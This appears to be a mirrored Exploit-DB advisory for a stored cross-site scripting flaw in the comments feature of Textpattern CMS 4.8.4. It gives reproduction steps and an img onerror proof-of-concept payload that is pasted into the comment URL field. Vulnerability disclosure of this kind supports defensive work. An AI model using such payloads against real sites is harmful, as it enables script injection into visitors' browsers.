Textpattern CMS 4.8.4 – ‘Comments’ Persistent Cross-Site Scripting (XSS)

  • 作者: Tushar Vaidya
    日期: 2021-03-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49616/
  • # Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
    # Date: 2021-03-04
    # Exploit Author: Tushar Vaidya
    # Vendor Homepage: https://textpattern.com
    # Software Link: https://textpattern.com/start
    # Version: v 4.8.4
    # Tested on: Windows
    
    Steps-To-Reproduce:
    1. Login into Textpattern CMS admin panel.
    2. Now go to the *Content > C**omments > Message*.
    3. Now paste the below payload in the URL field.
    
    Ba1man”><img src=x onerror=confirm(document.location)>
    
    4. Now click on the *Save* button.
    5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head
    5. The XSS will be triggered.